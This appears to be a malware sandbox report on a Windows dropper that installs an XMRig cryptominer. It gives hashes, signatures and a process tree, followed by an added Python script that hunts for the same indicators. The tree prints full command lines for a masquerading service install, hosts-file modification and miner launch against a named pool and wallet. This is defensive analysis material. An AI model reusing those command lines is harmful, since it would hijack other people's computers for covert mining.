Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted
23-12-2024 15:20
Static task
static1
Behavioral task
behavioral1
Sample
ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe
Resource
win7-20240903-en
General
-
Target
ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe
-
Size
910KB
-
MD5
ca0fb79fde083ec2ba5625c6d1c208d8
-
SHA1
eb215b41f55ac1588d09354f5b1d32d5de92f248
-
SHA256
ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229
-
SHA512
e990977492d710767a1847782399ca8078cd74303afabe0a68469d3006ccd6125442cc72e12860f5c04b7cc16fd8e3ddbd3ad6b906abcbb9970d0ca239aebfc7
-
SSDEEP
12288:SvfyIIIzAClE7uDOch+h2ul/mJot38gi5Y9ND3aHSkRcdT1/zdP1r:esSzlEqF+hVcOfi5YrDAWT9Bdr
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 1 IoCs
resource                                      yara_rule
behavioral2/files/0x000a000000023b7d-23.dat   xmrig
Drops file in Drivers directory 2 IoCs
description                   ioc                                     Process
File opened for modification  C:\Windows\System32\drivers\etc\hosts   irsetup.exe
File created                  C:\Windows\System32\drivers\etc\hosts   irsetup.exe
Executes dropped EXE 5 IoCs
pid    Process
1052   irsetup.exe
3916   svchost.exe
2936   svchost.exe
860    svchost.exe
1896   csrss.exe
UPX packed file (yara rule "upx") 3 IoCs
resource                                                              yara_rule
behavioral2/files/0x000d000000023b6e-2.dat                            upx
behavioral2/memory/1052-4-0x0000000000400000-0x0000000000527000-memory.dmp    upx
behavioral2/memory/1052-33-0x0000000000400000-0x0000000000527000-memory.dmp   upx
Launches sc.exe 1 IoCs
sc.exe is the Windows utility for creating, configuring and controlling services.
pid    Process
1392   sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description   ioc                                                          Process
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   PING.EXE
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   irsetup.exe
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   cmd.exe
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   PING.EXE
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   sc.exe
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   PING.EXE
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid    Process
4116   PING.EXE
2256   PING.EXE
4932   PING.EXE
Runs ping.exe 1 TTPs 3 IoCs
pid    Process
2256   PING.EXE
4932   PING.EXE
4116   PING.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs
description                   pid    Process
Token: SeLockMemoryPrivilege  1896   csrss.exe
(XMRig requests SeLockMemoryPrivilege so it can back its hashing scratchpads with large pages; seeing it requested by a binary named csrss.exe from C:\ProgramData is a strong miner indicator on its own.)
Suspicious use of SetWindowsHookEx 2 IoCs
pid    Process
1052   irsetup.exe
1052   irsetup.exe
Suspicious use of WriteProcessMemory 24 IoCs
description                         pid    Process                                                                 procid_target
PID 2296 wrote to memory of 1052    2296   ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe   83
PID 2296 wrote to memory of 1052    2296   ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe   83
PID 2296 wrote to memory of 1052    2296   ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe   83
PID 1052 wrote to memory of 4912    1052   irsetup.exe                                                             84
PID 1052 wrote to memory of 4912    1052   irsetup.exe                                                             84
PID 1052 wrote to memory of 4912    1052   irsetup.exe                                                             84
PID 4912 wrote to memory of 3916    4912   cmd.exe                                                                 86
PID 4912 wrote to memory of 3916    4912   cmd.exe                                                                 86
PID 4912 wrote to memory of 2256    4912   cmd.exe                                                                 87
PID 4912 wrote to memory of 2256    4912   cmd.exe                                                                 87
PID 4912 wrote to memory of 2256    4912   cmd.exe                                                                 87
PID 4912 wrote to memory of 1392    4912   cmd.exe                                                                 92
PID 4912 wrote to memory of 1392    4912   cmd.exe                                                                 92
PID 4912 wrote to memory of 1392    4912   cmd.exe                                                                 92
PID 4912 wrote to memory of 4932    4912   cmd.exe                                                                 93
PID 4912 wrote to memory of 4932    4912   cmd.exe                                                                 93
PID 4912 wrote to memory of 4932    4912   cmd.exe                                                                 93
PID 4912 wrote to memory of 2936    4912   cmd.exe                                                                 96
PID 4912 wrote to memory of 2936    4912   cmd.exe                                                                 96
PID 860 wrote to memory of 1896     860    svchost.exe                                                             99
PID 860 wrote to memory of 1896     860    svchost.exe                                                             99
PID 4912 wrote to memory of 4116    4912   cmd.exe                                                                 103
PID 4912 wrote to memory of 4116    4912   cmd.exe                                                                 103
PID 4912 wrote to memory of 4116    4912   cmd.exe                                                                 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe  (PID 2296)
  command line: "C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\_ir_sf7_temp_0\irsetup.exe  (PID 1052)
    command line: __IRAOFF:520716 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe"
    - Drops file in Drivers directory
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe  (PID 4912)
      command line: C:\Windows\system32\cmd.exe /c C:\ProgramData\Temp\run64.bat
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\ProgramData\Temp\svchost.exe  (PID 3916)
        command line: C:\ProgramData\Temp\svchost.exe install "Disk Defragmenter Reports" C:\ProgramData\Temp\csrss.exe -o pool.ppxxmr.com:443 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k --max-cpu-usage=50
        - Executes dropped EXE

      C:\Windows\SysWOW64\PING.EXE  (PID 2256)
        command line: ping -n 3 127.0.0.1
        - System Location Discovery: System Language Discovery
        - System Network Configuration Discovery: Internet Connection Discovery
        - Runs ping.exe

      C:\Windows\SysWOW64\sc.exe  (PID 1392)
        command line: sc description "Disk Defragmenter Reports" "磁盘碎片整理报告提供支持。"
        (the description argument is GBK text that the raw report renders as CP437 box-drawing characters; it reads "Provides support for Disk Defragmenter reports.")
        - Launches sc.exe
        - System Location Discovery: System Language Discovery

      C:\Windows\SysWOW64\PING.EXE  (PID 4932)
        command line: ping -n 2 127.0.0.1
        - System Location Discovery: System Language Discovery
        - System Network Configuration Discovery: Internet Connection Discovery
        - Runs ping.exe

      C:\ProgramData\Temp\svchost.exe  (PID 2936)
        command line: C:\ProgramData\Temp\svchost.exe start "Disk Defragmenter Reports"
        - Executes dropped EXE

      C:\Windows\SysWOW64\PING.EXE  (PID 4116)
        command line: ping -n 3 127.0.0.1
        - System Location Discovery: System Language Discovery
        - System Network Configuration Discovery: Internet Connection Discovery
        - Runs ping.exe

C:\ProgramData\Temp\svchost.exe  (PID 860, started as the "Disk Defragmenter Reports" service)
  command line: C:\ProgramData\Temp\svchost.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory

  C:\ProgramData\Temp\csrss.exe  (PID 1896)
    command line: "C:\ProgramData\Temp\csrss.exe" -o pool.ppxxmr.com:443 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k --max-cpu-usage=50
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
-
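Hunting logic for the chain in the process tree above, as an added example that is not code from the sandbox report or from the sample. It rebuilds the report's process records as constructed input (same PIDs, image paths and arguments as shown in the tree) and flags the four things a responder should key on here: XMRig-style -o/-u pool and wallet arguments (with the wallet validated as a 95-character Monero address), system-process file names (svchost.exe, csrss.exe) executed from outside System32/SysWOW64, ping against loopback used as the batch script's sleep, and the service name handed to the wrapper's install/start verbs and to sc.exe. The Proc record layout, the heuristics, the thresholds and the function names are this example's own assumptions, not Triage's schema; the sc description text is a placeholder because the report shows it mis-rendered.

```python
# Added example, not the sandbox's or the sample's code. Process records below are
# constructed from the report's process tree (same PIDs, paths and arguments); the
# record layout, heuristics and function names are this example's own assumptions.
import ntpath
import re
import shlex
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str      # path of the executed image
    cmdline: str    # command line as recorded by the sandbox


ROOT = r"C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe"
WALLET = "46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc"
MINER_ARGS = "-o pool.ppxxmr.com:443 -u " + WALLET + " -p x -k --max-cpu-usage=50"
SVC = '"Disk Defragmenter Reports"'

SAMPLE_PROCS = [  # constructed from the report; the sc description text is a placeholder
    Proc(2296, 0, ROOT, '"' + ROOT + '"'),
    Proc(1052, 2296, r"C:\Users\Admin\AppData\Local\Temp\_ir_sf7_temp_0\irsetup.exe", '__IRAOFF:520716 "__IRAFN:' + ROOT + '"'),
    Proc(4912, 1052, r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\system32\cmd.exe /c C:\ProgramData\Temp\run64.bat"),
    Proc(3916, 4912, r"C:\ProgramData\Temp\svchost.exe",
         r"C:\ProgramData\Temp\svchost.exe install " + SVC + r" C:\ProgramData\Temp\csrss.exe " + MINER_ARGS),
    Proc(2256, 4912, r"C:\Windows\SysWOW64\PING.EXE", "ping -n 3 127.0.0.1"),
    Proc(1392, 4912, r"C:\Windows\SysWOW64\sc.exe", "sc description " + SVC + ' "placeholder description"'),
    Proc(4932, 4912, r"C:\Windows\SysWOW64\PING.EXE", "ping -n 2 127.0.0.1"),
    Proc(2936, 4912, r"C:\ProgramData\Temp\svchost.exe", r"C:\ProgramData\Temp\svchost.exe start " + SVC),
    Proc(4116, 4912, r"C:\Windows\SysWOW64\PING.EXE", "ping -n 3 127.0.0.1"),
    Proc(860, 0, r"C:\ProgramData\Temp\svchost.exe", r"C:\ProgramData\Temp\svchost.exe"),
    Proc(1896, 860, r"C:\ProgramData\Temp\csrss.exe", r'"C:\ProgramData\Temp\csrss.exe" ' + MINER_ARGS),
]

# Monero mainnet standard ('4...') or sub-address ('8...'): 95 base58 characters.
XMR_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
SYSTEM_IMAGES = {"svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "services.exe", "smss.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def tokens(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def miner_args(cmdline):
    """Return pool/wallet details when the line carries XMRig-style -o/-u arguments, else None."""
    toks = tokens(cmdline)
    pool = wallet = None
    for i, t in enumerate(toks[:-1]):
        if t in ("-o", "--url"):
            pool = toks[i + 1]
        elif t in ("-u", "--user"):
            wallet = toks[i + 1]
    if pool is None or wallet is None:
        return None
    return {"pool": pool, "wallet": wallet, "wallet_ok": bool(XMR_ADDR.match(wallet))}


def masquerading(p):  # system-process name run from outside the Windows system directories (T1036.005)
    return (ntpath.basename(p.image).lower() in SYSTEM_IMAGES
            and ntpath.dirname(p.image).lower() not in SYSTEM_DIRS)


def ping_delay(p):
    """ping -n <count> against loopback: the batch script's substitute for sleep."""
    toks = tokens(p.cmdline)
    return (ntpath.basename(p.image).lower() == "ping.exe"
            and "-n" in toks and toks[-1] in ("127.0.0.1", "localhost", "::1"))


def service_name(p):
    """Service name passed to a wrapper's install/start verb or to sc.exe."""
    toks = tokens(p.cmdline)
    if len(toks) < 3:
        return None
    verb = toks[1].lower()
    if verb in ("install", "start", "stop", "remove"):
        return toks[2]
    if ntpath.basename(p.image).lower() == "sc.exe" and verb in ("create", "config", "description", "failure"):
        return toks[2]
    return None


def hunt(procs):
    """Run every check and return (pid, tag, detail) findings in process order."""
    out = []
    for p in procs:
        m = miner_args(p.cmdline)
        svc = service_name(p)
        if m:
            out.append((p.pid, "xmrig_cmdline", m))
        if masquerading(p):
            out.append((p.pid, "masquerade_system_name", p.image))
        if ping_delay(p):
            out.append((p.pid, "ping_loopback_delay", p.cmdline))
        if svc:
            out.append((p.pid, "service_manipulation", svc))
    return out


def ancestry(procs, pid):
    """Image names from the earliest recorded ancestor down to pid."""
    by_pid = {p.pid: p for p in procs}
    chain = []
    while pid in by_pid:
        chain.append(ntpath.basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]
```

Run over the constructed records, hunt() reports the miner command line twice (once as the argument list given to the wrapper's install verb, once as the service-launched csrss.exe), all four ProgramData copies of svchost.exe/csrss.exe as masquerading, the three ping delays, and "Disk Defragmenter Reports" from all three service-touching commands; ancestry() of PID 1896 stops at PID 860 because the service host's parent (the SCM) is not in the tree, which is itself the tell that the persistence is a service.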
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize  413KB
MD5       9fb6eb5b8e72e6671765a91f12f273fb
SHA1      e476d2caaaf8506d8798cca874ab70f31a23a44f
SHA256    9a0db3da87598e4e38a40d8a49bf71e5f708fb3de3b044db0c17ab369041c1b4
SHA512    3e2188c99e6cc6dc9062896d628b5df834c629a7000040b46d640f495c93af27b3cf32ac6af8ea88a57e343d0dbb815658cfa6df6c62be8dee208373c9ef2fed
-
Filesize  484B
MD5       39a4b61f3776e96201ff30b4f4a28afd
SHA1      f293bfe02dd2b058330dce8a3ddab23ac5ea708d
SHA256    27ed8d3eab67d1ce02e40542e18d8444f4a9e7989a02cb7f41baf88f9d544d02
SHA512    b0cb6592dd5dcac3b31ee6979d04eb564523da1903fe9b0bb47fc331c1af2557aafff9237ad9b9cd849fecbcde13fa482517048a96becaaa8ca58f7216b288c8
-
Filesize  345KB
MD5       1e706b1e8d3bd3764e3ee4bf5fe509d8
SHA1      ba457bfcdc1b66609f142c3578be647c51d1356d
SHA256    29f0dbf2d07c4b68c3c9ee0d139d80bad3e9058fbf9dbd574cb5b047cf742e74
SHA512    f1b6eb345e3114e68a8b78cb711717b60b4604e6ff7578c2df3861187946b05b77259243e5b04c4b7e4a16dd6b1045a94f99cbeb46e5eac9e8c43c82d9e9d924
-
Filesize  440KB
MD5       75ca7ff96bf5a316c3af2de6a412bd54
SHA1      0a093950790ff0dddff6f5f29c6b02c10997e0c5
SHA256    d95b5bf9ca97c1900de5357743282bab655d61d616606485088e1708559b7cf1
SHA512    b8da86f2f1e908955254e5168d0447f479cec7815a8b081a7b38eb87187cb2eb992109c67e006361b96bc1529ee8abc9dc477d78e9ca565e43f5415b492771d4